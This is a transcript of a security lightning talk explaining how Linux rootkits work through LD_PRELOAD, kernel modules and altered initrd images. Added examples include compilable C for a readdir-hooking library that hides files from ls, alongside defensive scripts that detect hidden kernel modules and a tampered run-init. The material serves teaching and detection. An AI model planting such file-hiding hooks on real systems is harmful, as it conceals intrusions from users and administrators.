Linux Rootkit Internals
@tkmru
December 23, 2017
Transcript
Linux Rootkit Internals. Cyber Wargame Christmas Party (security), 12/23, @tkmru

Self-introduction
• takemaru (@tkmru)
• CTF team: TomoriNao
• Doujinshi circle: TomoriNao
• I missed out on a Winter Comiket slot, so I'm presenting the material I had planned to write up in a doujinshi.
What is a rootkit?
• Malware that hides running processes, files, logs and system data from the user
• e.g. hides itself from the ps and top commands; hides the malware's own files and processes
• This lightning talk covers rootkits that target Linux

• Many of them are published as OSS on GitHub
• (Probably) for research?
• You can read the malware's source code!!
• Summary: https://github.com/tkmru/awesome-linux-rootkits

The code is on GitHub!!
Various Linux rootkits
• LD_PRELOAD rootkits
• Kernel module rootkits
• Ramdisk-based rootkits

LD_PRELOAD rootkit
• A rootkit built on the fact that the LD_PRELOAD environment variable lets you swap in your own shared library
• e.g. Jynx2, vlany, azazel
What is LD_PRELOAD?
• An environment variable that sets the path of a shared library (.so) to be loaded before all others
• When the dynamic linker resolves a symbol and the same name is defined in more than one library, the function in the .so listed in LD_PRELOAD is taken first
• This lets you override libc functions from outside the program, which is what the rootkit relies on
• Caveat: the dynamic linker ignores LD_PRELOAD for set-user-ID binaries, and a statically linked binary never consults it at all, so such programs still see the truth
What is LD_PRELOAD?
$ ldd $(which ls)   # the shared libraries ls is dynamically linked against
    linux-vdso.so.1 => (0x00007ffdc1b78000)
    libselinux.so.1 => /lib/x86_64-linux-gnu/libselinux.so.1 (0x00007fbe97fb5000)
    libacl.so.1 => /lib/x86_64-linux-gnu/libacl.so.1 (0x00007fbe97dad000)
    libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fbe979e3000)
    libpcre.so.3 => /lib/x86_64-linux-gnu/libpcre.so.3 (0x00007fbe977a5000)
    libdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007fbe975a1000)
    /lib64/ld-linux-x86-64.so.2 (0x000055f1ce4c8000)
    libattr.so.1 => /lib/x86_64-linux-gnu/libattr.so.1 (0x00007fbe9739b000)
$ LD_PRELOAD=./hook.so /bin/ls   # hook the functions ls calls!!
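The hook.so in the slide is not provided, so here is an added example (not code from the slides or from any of the rootkits named above) of the smallest version of the trick: a shared library that wraps readdir and drops every entry whose name starts with a prefix, built and run against the stock ls with and without LD_PRELOAD. The prefix "rk_", the fixture file names and the use of ${CC:-cc} are assumptions made for this demo.

```shell
#!/bin/sh
# Added example: build a readdir-hooking LD_PRELOAD library and show that
# `ls` stops listing files with a chosen prefix once it is preloaded.
set -e

HIDE_PREFIX="rk_"   # assumed marker; real rootkits use their own magic string

# Write and compile the hook library into $1 (a scratch directory).
build_hook() {
    dir=$1
    cat > "$dir/hook.c" <<'EOF'
#define _GNU_SOURCE          /* needed for RTLD_NEXT */
#include <dirent.h>
#include <dlfcn.h>
#include <string.h>

/* Entries whose name starts with this prefix never reach the caller. */
static const char HIDE_PREFIX[] = "rk_";

static int should_hide(const char *name)
{
    return strncmp(name, HIDE_PREFIX, sizeof HIDE_PREFIX - 1) == 0;
}

/* Same symbol name as libc's readdir: with LD_PRELOAD the dynamic linker
 * binds the program's calls to this definition. RTLD_NEXT then locates
 * the real libc implementation so we can call through to it. */
struct dirent *readdir(DIR *dirp)
{
    static struct dirent *(*real)(DIR *);
    struct dirent *ent;
    if (!real)
        real = dlsym(RTLD_NEXT, "readdir");
    while ((ent = real(dirp)) != NULL && should_hide(ent->d_name))
        ;                    /* skip entries we want hidden */
    return ent;
}

#ifdef __GLIBC__
/* coreutils is built with _FILE_OFFSET_BITS=64, so on glibc ls actually
 * calls readdir64; a hook that only covers readdir would miss it. */
struct dirent64 *readdir64(DIR *dirp)
{
    static struct dirent64 *(*real)(DIR *);
    struct dirent64 *ent;
    if (!real)
        real = dlsym(RTLD_NEXT, "readdir64");
    while ((ent = real(dirp)) != NULL && should_hide(ent->d_name))
        ;
    return ent;
}
#endif
EOF
    "${CC:-cc}" -shared -fPIC -O2 -o "$dir/hook.so" "$dir/hook.c" -ldl
}

# Create a target directory with one normal and one "hidden" file (constructed fixture).
make_fixture() {
    mkdir -p "$1/target"
    : > "$1/target/normal.txt"
    : > "$1/target/${HIDE_PREFIX}secret"
}

# List directory $2 with ls; $1 is the library to preload ("" for none).
list_dir() {
    LD_PRELOAD=$1 ls "$2"
}

# Return 0 if the entry named $2 is absent from the hooked listing of $1/target.
hidden_by_hook() {
    case $(list_dir "$1/hook.so" "$1/target") in
        *"$2"*) return 1 ;;
        *)      return 0 ;;
    esac
}

# LD_PRELOAD only works on dynamically linked programs; report whether ls is one.
ls_is_dynamic() {
    case $(ldd "$(command -v ls)" 2>&1) in
        *"not a dynamic"*|*"statically linked"*) return 1 ;;
        *) return 0 ;;
    esac
}

if [ "${LD_PRELOAD_DEMO:-}" = "1" ]; then
    work=$(mktemp -d)
    build_hook "$work"
    make_fixture "$work"
    echo "without hook:"; list_dir "" "$work/target"
    echo "with hook:";    list_dir "$work/hook.so" "$work/target"
    rm -rf "$work"
fi
```

Run it with LD_PRELOAD_DEMO=1 to see both listings. The hook is deliberately naive: it does not hide the library itself from /proc/<pid>/maps or from ldd, it only covers readdir, and anything that calls getdents64 directly or is statically linked still sees rk_secret, which is exactly the gap a kernel-level rootkit closes.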
Kernel module rootkit
• A rootkit that uses a loadable kernel module to rewrite the kernel's behaviour
• Also called a kernel rootkit or an LKM (Loadable Kernel Module) rootkit
• e.g. adore, suterusu, diamorphine, etc.

What is a kernel module?
• Patching the kernel's code directly to add a feature means recompiling the kernel and rebooting
• With a kernel module you can add functionality to the running kernel casually
• The legitimate use is adding device drivers, e.g. for a NIC

Kernel module rootkit
• Implements the rootkit functionality by loading a kernel module that hooks system calls
• Examples of how it operates:
• Hook the relevant system call and change what it does
• Redirect the execution of a file so that a different binary runs instead
• Change only the information that is finally returned to user space (e.g. filter the entries that getdents would hand back, so a hidden file or PID never appears in any listing)
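A kernel module cannot be built or loaded here, so as an added example (not code from the slides or from any of the rootkits named above) here is one of the checks a responder runs after reading the paragraph above. /proc/modules, which lsmod reads, is built from the kernel's module list, while /sys/module/<name>/initstate exists for every module that went through the module loader. A rootkit that only unlinks itself from the list (as the older adore-style modules did) keeps its sysfs directory and shows up in the second place only. The function takes both paths as arguments so it runs against the constructed fixture below as well as the live /proc/modules and /sys/module; "evilmod" and the listing contents are constructed.

```shell
#!/bin/sh
# Added example: report modules present in sysfs but missing from the
# /proc/modules-style listing (one heuristic for a self-hiding LKM).
set -e

# $1: file in /proc/modules format; $2: directory in /sys/module layout.
# Prints the names that have an initstate file but no line in $1.
find_unlisted_modules() {
    proc_modules=$1
    sys_module=$2
    for d in "$sys_module"/*/; do
        # built-in modules also get a /sys/module/<name> directory (for their
        # parameters) but never an initstate file, so skip those
        [ -f "${d}initstate" ] || continue
        name=${d%/}; name=${name##*/}
        if ! grep -q "^$name " "$proc_modules"; then
            echo "$name"
        fi
    done
}

# Constructed fixture: an lsmod-style listing plus a matching sysfs tree
# where "evilmod" is loaded (has initstate) but absent from the listing.
make_fixture() {
    root=$1
    mkdir -p "$root/sys_module/ext4" "$root/sys_module/xfs" \
             "$root/sys_module/evilmod" "$root/sys_module/printk"
    echo live > "$root/sys_module/ext4/initstate"
    echo live > "$root/sys_module/xfs/initstate"
    echo live > "$root/sys_module/evilmod/initstate"
    # printk stands in for a built-in: directory present, no initstate.
    cat > "$root/proc_modules" <<'EOF'
ext4 598016 1 - Live 0xffffffffc0200000
xfs 1323008 0 - Live 0xffffffffc0300000
EOF
}

# With --live, run the check against the real kernel interfaces.
if [ "${1:-}" = "--live" ] && [ -r /proc/modules ]; then
    find_unlisted_modules /proc/modules /sys/module
fi
```

This is a heuristic, not proof of absence: diamorphine and several other OSS modules also delete their sysfs kobject, so they pass this check and you need a second view (for example walking the kernel's module memory with Volatility, as the Jynx2 memory-analysis paper in the references does for user space) to catch them.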
Ramdisk-based rootkit
• A rootkit that works by rewriting the initrd (the initial RAM disk)
• A relatively new type of rootkit
• e.g. Horse Pill: Black Hat USA 2016
• https://www.blackhat.com/docs/us-16/materials/us-16-Leibowitz-Horse-Pill-A-New-Type-Of-Linux-Rootkit.pdf

What is initrd?
• A compressed archive of the files needed to mount the root file system
• Used early in the boot process
• Once the initrd is loaded, the kernel modules and other pieces needed to make the file system usable are read from it, and the file system is mounted under /

Where in the boot process?
• UEFI
• shim
• grub
• linooks (the Linux kernel)
• initrd
• systemd
• app
$ ls -l /boot   (partially omitted)
drwxr-xr-x 5 root root     4096 Dec  9 06:40 grub
-rw-r--r-- 1 root root 20566118 Dec  9 06:41 initrd.img-3.19.0-80-generic   <- newer than the kernel image
-rw------- 1 root root  6595152 Jan 13  2017 vmlinuz-3.19.0-80-generic

Looking at the initrd
• It is generated automatically by the system under /boot
• Why?
• The files have to be adjusted to the environment (hardware, file system, etc.)
• It is regenerated automatically by software updates

$ file /boot/initrd.img-3.19.0-80-generic
/boot/initrd.img-3.19.0-80-generic: gzip compressed data, from Unix, last modified: Sat Dec 9 06:40:55 2017
$ gunzip --to-stdout /boot/initrd.img-3.19.0-80-generic | cpio -tv   (partially omitted)
-rwxr-xr-x 1 root root 1600 Jun 13 2017 bin/insmod
-rwxr-xr-x 1 root root  976 Jun 13 2017 bin/dmesg
-rwxr-xr-x 1 root root 4872 Jun 13 2017 bin/run-init
-rwxr-xr-x 1 root root 3904 Jun 13 2017 bin/dd

Looking at the initrd
• Compressed with gzip
• Contains command binaries, firmware, and so on
• Caveat: on newer initramfs-tools releases the image is several cpio archives concatenated (an uncompressed early archive with CPU microcode first, then the compressed main one), so a plain gunzip | cpio stops after the first segment; use lsinitramfs or unmkinitramfs from initramfs-tools to see the whole thing
How does the rootkit use the initrd?
• Replace the run-init binary inside the initrd
• Spawn the rootkit's process at boot, before the real init runs
• Because the initrd is generated automatically and changes from time to time with system updates, a modification is hard to notice
• Note that the kernel image itself is untouched, so package checks on vmlinuz and Secure Boot's signature check on the kernel do not cover it; on an install like the one above the initrd is not signed at all
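The defensive counterpart of the step above, as an added example (not from the slides or from Horse Pill): extract a named member from a gzip-compressed cpio initrd and hash it, so it can be compared with the file the initrd was built from. On the Ubuntu system in the slides that source is the run-init shipped in the klibc-utils package (an assumption here, so the script takes the reference path as an argument). Because this has to run offline, it builds two tiny initrd-shaped archives itself, one clean and one with bin/run-init replaced; the run-init contents, the planted line and the file names are constructed.

```shell
#!/bin/sh
# Added example: hash a member of a gzip'd cpio initrd and compare it with
# a reference copy, to detect a replaced run-init.
set -e

# Extract member $2 from the gzip'd cpio archive $1 (absolute path) and
# print its SHA-256; prints nothing if the member is absent.
initrd_member_sha256() {
    archive=$1; member=$2
    tmp=$(mktemp -d)
    ( cd "$tmp" && gzip -dc "$archive" | cpio -id 2>/dev/null )
    if [ -f "$tmp/$member" ]; then
        sha256sum "$tmp/$member" | cut -d' ' -f1
    fi
    rm -rf "$tmp"
}

# Return 0 when bin/run-init inside archive $1 matches reference file $2.
check_run_init() {
    [ "$(initrd_member_sha256 "$1" bin/run-init)" = "$(sha256sum "$2" | cut -d' ' -f1)" ]
}

# Build a gzip'd newc cpio archive (the format initramfs-tools uses) from
# directory $1 into file $2.
pack_initrd() {
    ( cd "$1" && find . -mindepth 1 | sed 's|^\./||' | cpio -o -H newc 2>/dev/null ) | gzip -9 > "$2"
}

# Constructed fixtures under $1: a "good" tree, a "bad" tree whose run-init
# has an extra process planted in it, and a reference copy of the good binary.
make_fixtures() {
    root=$1
    mkdir -p "$root/good/bin" "$root/bad/bin" "$root/ref"
    # stand-in for the real run-init (the real one is a klibc binary)
    printf '#!/bin/sh\nexec chroot . "$@"\n' > "$root/good/bin/run-init"
    cp "$root/good/bin/run-init" "$root/ref/run-init"
    cp "$root/good/bin/run-init" "$root/bad/bin/run-init"
    # the tampered copy starts a daemon before handing over to init,
    # which is the effect Horse Pill's replacement run-init has
    printf '\n/rootkit/daemon &\n' >> "$root/bad/bin/run-init"
    chmod 755 "$root/good/bin/run-init" "$root/bad/bin/run-init"
    pack_initrd "$root/good" "$root/good.img"
    pack_initrd "$root/bad"  "$root/bad.img"
}
```

Against a real box you would call check_run_init with /boot/initrd.img-<version> and the packaged run-init, after first confirming the package file itself with dpkg -V; if the image is a concatenated one, unpack it with unmkinitramfs instead of the gzip | cpio step. A hash mismatch is a strong signal, but a match only says the binary is original: Horse Pill's author also discusses hooking from other points, so a clean run-init does not clear the initrd.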
Closing
• This talk introduced which Linux mechanisms Linux rootkits make use of
• For detection there are tools such as OSSEC, chkrootkit and rkhunter
• I intend to test how many of the rootkits published as OSS they can detect
• Look forward to the next installment!!!
References
• The magic of LD_PRELOAD for Userland Rootkits | FlUxIuS' Blog (http://fluxius.handgrep.se/2011/10/31/the-magic-of-ld_preload-for-userland-rootkits/)
• ITmedia Enterprise: Part 5, An overview of kernel rootkits (http://www.itmedia.co.jp/enterprise/0306/10/epn12.html)
• @IT: First steps in incident response, Part 4: The LKM rootkits intruders plant (http://www.atmarkit.co.jp/fsecurity/rensai/rootkit04/rootkit02.html)
• The Horse Pill Rootkit vs. Forcepoint Threat Protection for Linux | Forcepoint (https://blogs.forcepoint.com/security-labs/horse-pill-rootkit-vs-forcepoint-threat-protection-linux)

Material useful for analysis
• Linux Rootkit Detection With OSSEC (https://www.sans.org/reading-room/whitepapers/detection/rootkit-detection-ossec-34555): a SANS paper on detecting rootkits with OSSEC
• Malware memory analysis of the Jynx2 Linux rootkit (Part 1) (http://www.dtic.mil/get-tr-doc/pdf?AD=AD1004190): a DRDC (Defence Research and Development Canada) paper that analyses a memory dump of Jynx2 with Volatility